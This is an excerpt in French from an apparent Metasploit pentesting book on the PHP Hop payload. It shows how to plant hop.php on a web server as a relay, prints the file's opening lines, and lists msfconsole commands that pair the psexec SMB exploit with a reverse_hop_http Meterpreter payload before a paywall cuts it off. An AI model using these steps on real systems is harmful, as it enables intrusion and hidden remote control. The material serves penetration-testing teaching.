PHP Hop

PHP Hop est un payload permettant de faire transiter l’ensemble des communications à travers une connexion HTTP ou HTTPS (un hop point).

Afin d’exécuter cela, il est nécessaire de déposer le code PHP permettant de réaliser le tunneling au sein d’un serveur web accessible et autorisant l’exécution du PHP. Le code PHP se trouve au sein du framework Metasploit dans le fichier /usr/share/metasploit-framework/data/php/hop.php :

root@kali:~# head /usr/share/metasploit-framework/data/php/hop.php  
<?php  
$magic = 'TzGq';  
$tempdir = sys_get_temp_dir() . "/hop" . $magic;  
if(!is_dir($tempdir)){  
   mkdir($tempdir); //make sure it's there  
}  
 
//get url  
$url = $_SERVER["QUERY_STRING"];  
//like /path/hop.php?/uRIcksm_lOnGidENTifIEr 

Une fois le code PHP mis en place, certains modules permettent l’utilisation de payloads de type reverse_hop_http tel que psexec par exemple :

msf5 > use exploit/windows/smb/psexec  
 
msf5 exploit(windows/smb/psexec) > set PAYLOAD  
windows/meterpreter/reverse_hop_http  
PAYLOAD => windows/meterpreter/reverse_hop_http 
 
msf5 exploit(windows/smb/psexec) > set RHOSTS XX.XX.45.235  
RHOSTS => XX.XX.45.235 
 
msf5 exploit(windows/smb/psexec) > set SMBPass Password  ...
Pour consulter la suite, découvrez le livre suivant :
couv_EPMETAS.png
60-signet.svg
En version papier
20-ecran_lettre.svg
En version numérique
41-logo_abonnement.svg
En illimité avec l'abonnement ENI
130-boutique.svg
Sur la boutique officielle ENI
Précédent
Tunner l’invite de commande Metasploit
Suivant
Lire la documentation